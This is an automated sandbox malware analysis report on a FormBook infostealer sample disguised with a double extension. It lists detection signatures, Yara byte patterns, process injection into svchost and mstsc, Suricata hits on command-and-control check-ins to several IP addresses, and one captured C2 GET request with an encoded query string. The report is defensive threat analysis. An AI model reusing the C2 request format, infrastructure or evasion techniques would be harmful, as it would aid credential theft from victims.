Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PO-78140924.BAT.PDF.exe

Overview

General Information

Sample name:PO-78140924.BAT.PDF.exe
Analysis ID:1519457
MD5:0c3d90f3a7607383e1e4a5da779b23f2
SHA1:bf3452b178fe50a53d94498cd2efc777c993954b
SHA256:4b3d9e2b4d5af94fe3953942fe920f42c3928a7c4c9d5ccd841bd1fac367690e
Tags:exeuser-TeamDreier
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Suspicious Double Extension File Execution
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to simulate keystroke presses
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • PO-78140924.BAT.PDF.exe (PID: 1560 cmdline: "C:\Users\user\Desktop\PO-78140924.BAT.PDF.exe" MD5: 0C3D90F3A7607383E1E4A5DA779B23F2)
    • svchost.exe (PID: 3192 cmdline: "C:\Users\user\Desktop\PO-78140924.BAT.PDF.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • YKkstfciYBQ.exe (PID: 2556 cmdline: "C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • mstsc.exe (PID: 6048 cmdline: "C:\Windows\SysWOW64\mstsc.exe" MD5: EA4A02BE14C405327EEBA8D9AD2BD42C)
          • firefox.exe (PID: 5768 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.3895831173.0000000000480000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000004.00000002.3895831173.0000000000480000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2bec0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x1404f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000004.00000002.3897012807.0000000000D10000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000004.00000002.3897012807.0000000000D10000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2bec0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x1404f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000004.00000002.3897058690.0000000000D60000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 10 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        2.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          2.2.svchost.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2e443:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x165d2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          2.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            2.2.svchost.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2f243:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x173d2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Suspicious Double Extension File Execution
            Source: Process startedAuthor: Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Users\user\Desktop\PO-78140924.BAT.PDF.exe", CommandLine: "C:\Users\user\Desktop\PO-78140924.BAT.PDF.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exe, NewProcessName: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exe, OriginalFileName: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Users\user\Desktop\PO-78140924.BAT.PDF.exe", ProcessId: 1560, ProcessName: PO-78140924.BAT.PDF.exe
            Sigma detected: Uncommon Svchost Parent Process
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\PO-78140924.BAT.PDF.exe", CommandLine: "C:\Users\user\Desktop\PO-78140924.BAT.PDF.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\PO-78140924.BAT.PDF.exe", ParentImage: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exe, ParentProcessId: 1560, ParentProcessName: PO-78140924.BAT.PDF.exe, ProcessCommandLine: "C:\Users\user\Desktop\PO-78140924.BAT.PDF.exe", ProcessId: 3192, ProcessName: svchost.exe
            Sigma detected: Windows Processes Suspicious Parent Directory
            Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\PO-78140924.BAT.PDF.exe", CommandLine: "C:\Users\user\Desktop\PO-78140924.BAT.PDF.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\PO-78140924.BAT.PDF.exe", ParentImage: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exe, ParentProcessId: 1560, ParentProcessName: PO-78140924.BAT.PDF.exe, ProcessCommandLine: "C:\Users\user\Desktop\PO-78140924.BAT.PDF.exe", ProcessId: 3192, ProcessName: svchost.exe

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-26T15:22:25.684016+020020507451Malware Command and Control Activity Detected192.168.2.54970981.88.63.4680TCP
            2024-09-26T15:22:49.195322+020020507451Malware Command and Control Activity Detected192.168.2.549713217.70.184.5080TCP
            2024-09-26T15:23:02.624619+020020507451Malware Command and Control Activity Detected192.168.2.549718172.96.187.6080TCP
            2024-09-26T15:23:16.977869+020020507451Malware Command and Control Activity Detected192.168.2.5497223.33.130.19080TCP
            2024-09-26T15:23:31.454204+020020507451Malware Command and Control Activity Detected192.168.2.54972767.223.117.18980TCP
            2024-09-26T15:24:06.264764+020020507451Malware Command and Control Activity Detected192.168.2.549731103.248.137.20980TCP
            2024-09-26T15:24:27.494268+020020507451Malware Command and Control Activity Detected192.168.2.5497353.33.130.19080TCP
            2024-09-26T15:24:40.651608+020020507451Malware Command and Control Activity Detected192.168.2.5497393.33.130.19080TCP
            2024-09-26T15:24:54.672159+020020507451Malware Command and Control Activity Detected192.168.2.54974385.153.138.11380TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-26T15:22:25.684016+020028554651A Network Trojan was detected192.168.2.54970981.88.63.4680TCP
            2024-09-26T15:22:49.195322+020028554651A Network Trojan was detected192.168.2.549713217.70.184.5080TCP
            2024-09-26T15:23:02.624619+020028554651A Network Trojan was detected192.168.2.549718172.96.187.6080TCP
            2024-09-26T15:23:16.977869+020028554651A Network Trojan was detected192.168.2.5497223.33.130.19080TCP
            2024-09-26T15:23:31.454204+020028554651A Network Trojan was detected192.168.2.54972767.223.117.18980TCP
            2024-09-26T15:24:06.264764+020028554651A Network Trojan was detected192.168.2.549731103.248.137.20980TCP
            2024-09-26T15:24:27.494268+020028554651A Network Trojan was detected192.168.2.5497353.33.130.19080TCP
            2024-09-26T15:24:40.651608+020028554651A Network Trojan was detected192.168.2.5497393.33.130.19080TCP
            2024-09-26T15:24:54.672159+020028554651A Network Trojan was detected192.168.2.54974385.153.138.11380TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-26T15:22:41.399078+020028554641A Network Trojan was detected192.168.2.549710217.70.184.5080TCP
            2024-09-26T15:22:43.918437+020028554641A Network Trojan was detected192.168.2.549711217.70.184.5080TCP
            2024-09-26T15:22:46.510005+020028554641A Network Trojan was detected192.168.2.549712217.70.184.5080TCP
            2024-09-26T15:22:54.968757+020028554641A Network Trojan was detected192.168.2.549714172.96.187.6080TCP
            2024-09-26T15:22:57.503736+020028554641A Network Trojan was detected192.168.2.549716172.96.187.6080TCP
            2024-09-26T15:23:00.059704+020028554641A Network Trojan was detected192.168.2.549717172.96.187.6080TCP
            2024-09-26T15:23:08.176919+020028554641A Network Trojan was detected192.168.2.5497193.33.130.19080TCP
            2024-09-26T15:23:11.813069+020028554641A Network Trojan was detected192.168.2.5497203.33.130.19080TCP
            2024-09-26T15:23:13.466122+020028554641A Network Trojan was detected192.168.2.5497213.33.130.19080TCP
            2024-09-26T15:23:22.709740+020028554641A Network Trojan was detected192.168.2.54972467.223.117.18980TCP
            2024-09-26T15:23:25.262284+020028554641A Network Trojan was detected192.168.2.54972567.223.117.18980TCP
            2024-09-26T15:23:27.824971+020028554641A Network Trojan was detected192.168.2.54972667.223.117.18980TCP
            2024-09-26T15:23:38.628177+020028554641A Network Trojan was detected192.168.2.549728103.248.137.20980TCP
            2024-09-26T15:23:41.173987+020028554641A Network Trojan was detected192.168.2.549729103.248.137.20980TCP
            2024-09-26T15:23:43.720757+020028554641A Network Trojan was detected192.168.2.549730103.248.137.20980TCP
            2024-09-26T15:24:19.848287+020028554641A Network Trojan was detected192.168.2.5497323.33.130.19080TCP
            2024-09-26T15:24:22.382753+020028554641A Network Trojan was detected192.168.2.5497333.33.130.19080TCP
            2024-09-26T15:24:24.949810+020028554641A Network Trojan was detected192.168.2.5497343.33.130.19080TCP
            2024-09-26T15:24:32.994875+020028554641A Network Trojan was detected192.168.2.5497363.33.130.19080TCP
            2024-09-26T15:24:35.552839+020028554641A Network Trojan was detected192.168.2.5497373.33.130.19080TCP
            2024-09-26T15:24:38.092661+020028554641A Network Trojan was detected192.168.2.5497383.33.130.19080TCP
            2024-09-26T15:24:46.627043+020028554641A Network Trojan was detected192.168.2.54974085.153.138.11380TCP
            2024-09-26T15:24:49.258935+020028554641A Network Trojan was detected192.168.2.54974185.153.138.11380TCP
            2024-09-26T15:24:51.979677+020028554641A Network Trojan was detected192.168.2.54974285.153.138.11380TCP
            2024-09-26T15:25:00.942005+020028554641A Network Trojan was detected192.168.2.549744172.67.165.2580TCP
            2024-09-26T15:25:03.909947+020028554641A Network Trojan was detected192.168.2.549745172.67.165.2580TCP
            2024-09-26T15:25:07.014255+020028554641A Network Trojan was detected192.168.2.549746172.67.165.2580TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus / Scanner detection for submitted sample
            Source: PO-78140924.BAT.PDF.exeAvira: detected
            Multi AV Scanner detection for submitted file
            Source: PO-78140924.BAT.PDF.exeReversingLabs: Detection: 79%
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000004.00000002.3895831173.0000000000480000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3897012807.0000000000D10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3897058690.0000000000D60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2158074372.0000000003B20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2157680976.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2158514500.0000000004200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.3897432800.0000000002360000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for sample
            Source: PO-78140924.BAT.PDF.exeJoe Sandbox ML: detected
            Source: PO-78140924.BAT.PDF.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: YKkstfciYBQ.exe, 00000003.00000000.2070305149.000000000077E000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: PO-78140924.BAT.PDF.exe, 00000000.00000003.2042653624.0000000004540000.00000004.00001000.00020000.00000000.sdmp, PO-78140924.BAT.PDF.exe, 00000000.00000003.2041650984.00000000046E0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2046417159.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2048886154.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2158145354.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, mstsc.exe, 00000004.00000002.3897347942.00000000044F0000.00000040.00001000.00020000.00000000.sdmp, mstsc.exe, 00000004.00000003.2170653792.0000000000DAF000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 00000004.00000002.3897347942.000000000468E000.00000040.00001000.00020000.00000000.sdmp, mstsc.exe, 00000004.00000003.2164958755.0000000000BFF000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: PO-78140924.BAT.PDF.exe, 00000000.00000003.2042653624.0000000004540000.00000004.00001000.00020000.00000000.sdmp, PO-78140924.BAT.PDF.exe, 00000000.00000003.2041650984.00000000046E0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2046417159.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2048886154.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2158145354.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, mstsc.exe, mstsc.exe, 00000004.00000002.3897347942.00000000044F0000.00000040.00001000.00020000.00000000.sdmp, mstsc.exe, 00000004.00000003.2170653792.0000000000DAF000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 00000004.00000002.3897347942.000000000468E000.00000040.00001000.00020000.00000000.sdmp, mstsc.exe, 00000004.00000003.2164958755.0000000000BFF000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: mstsc.pdbGCTL source: svchost.exe, 00000002.00000003.2115002578.0000000007300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2115127900.0000000007500000.00000004.00000020.00020000.00000000.sdmp, YKkstfciYBQ.exe, 00000003.00000003.2094204761.0000000003D42000.00000004.00000001.00020000.00000000.sdmp, YKkstfciYBQ.exe, 00000003.00000003.2093852104.0000000003C02000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: YKkstfciYBQ.exe, 00000003.00000002.3899395542.0000000003EDC000.00000004.80000000.00040000.00000000.sdmp, mstsc.exe, 00000004.00000002.3897855714.0000000004B1C000.00000004.10000000.00040000.00000000.sdmp, mstsc.exe, 00000004.00000002.3896033202.00000000006A1000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000006.00000002.2459301249.000000003282C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: mstsc.pdb source: svchost.exe, 00000002.00000003.2115002578.0000000007300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2115127900.0000000007500000.00000004.00000020.00020000.00000000.sdmp, YKkstfciYBQ.exe, 00000003.00000003.2094204761.0000000003D42000.00000004.00000001.00020000.00000000.sdmp, YKkstfciYBQ.exe, 00000003.00000003.2093852104.0000000003C02000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: YKkstfciYBQ.exe, 00000003.00000002.3899395542.0000000003EDC000.00000004.80000000.00040000.00000000.sdmp, mstsc.exe, 00000004.00000002.3897855714.0000000004B1C000.00000004.10000000.00040000.00000000.sdmp, mstsc.exe, 00000004.00000002.3896033202.00000000006A1000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000006.00000002.2459301249.000000003282C000.00000004.80000000.00040000.00000000.sdmp
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeCode function: 0_2_0007449B GetFileAttributesW,FindFirstFileW,FindClose,0_2_0007449B
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_0049C460 FindFirstFileW,FindNextFileW,FindClose,4_2_0049C460
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4x nop then xor eax, eax4_2_00489C00
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4x nop then pop edi4_2_0048E012
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4x nop then mov ebx, 00000004h4_2_00E504DE

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49714 -> 172.96.187.60:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49719 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49720 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49717 -> 172.96.187.60:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49710 -> 217.70.184.50:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49721 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49725 -> 67.223.117.189:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49713 -> 217.70.184.50:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49712 -> 217.70.184.50:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49711 -> 217.70.184.50:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49724 -> 67.223.117.189:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49713 -> 217.70.184.50:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49709 -> 81.88.63.46:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49709 -> 81.88.63.46:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49716 -> 172.96.187.60:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49718 -> 172.96.187.60:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49718 -> 172.96.187.60:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49732 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49741 -> 85.153.138.113:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49739 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49738 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49739 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49727 -> 67.223.117.189:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49731 -> 103.248.137.209:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49727 -> 67.223.117.189:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49746 -> 172.67.165.25:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49740 -> 85.153.138.113:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49730 -> 103.248.137.209:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49731 -> 103.248.137.209:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49743 -> 85.153.138.113:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49736 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49743 -> 85.153.138.113:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49734 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49722 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49726 -> 67.223.117.189:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49722 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49735 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49735 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49737 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49744 -> 172.67.165.25:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49733 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49728 -> 103.248.137.209:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49742 -> 85.153.138.113:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49729 -> 103.248.137.209:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49745 -> 172.67.165.25:80
            Performs DNS queries to domains with low reputation
            Source: DNS query: www.heldhold.xyz
            Source: Joe Sandbox ViewIP Address: 67.223.117.189 67.223.117.189
            Source: Joe Sandbox ViewIP Address: 217.70.184.50 217.70.184.50
            Source: Joe Sandbox ViewASN Name: VIMRO-AS15189US VIMRO-AS15189US
            Source: Joe Sandbox ViewASN Name: SINGLEHOP-LLCUS SINGLEHOP-LLCUS
            Source: Joe Sandbox ViewASN Name: DNC-ASDimensionNetworkCommunicationLimitedHK DNC-ASDimensionNetworkCommunicationLimitedHK
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /a4ar/?vf5pwn=bigEPZ6XMKFUrjbkOOF/tc1QSeZpy4rj9U81Matj+rZ/AUf1cwoUFkvfutX9dfv4h0MjihypUwM2GA6oEMuOCaAaQ3Lxux4SSFbsDgkYjgjAaiC5myZdzdYIguvdh1gvDg==&lHul=nfQTqL40vDEpIp30 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.2bhp.comConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
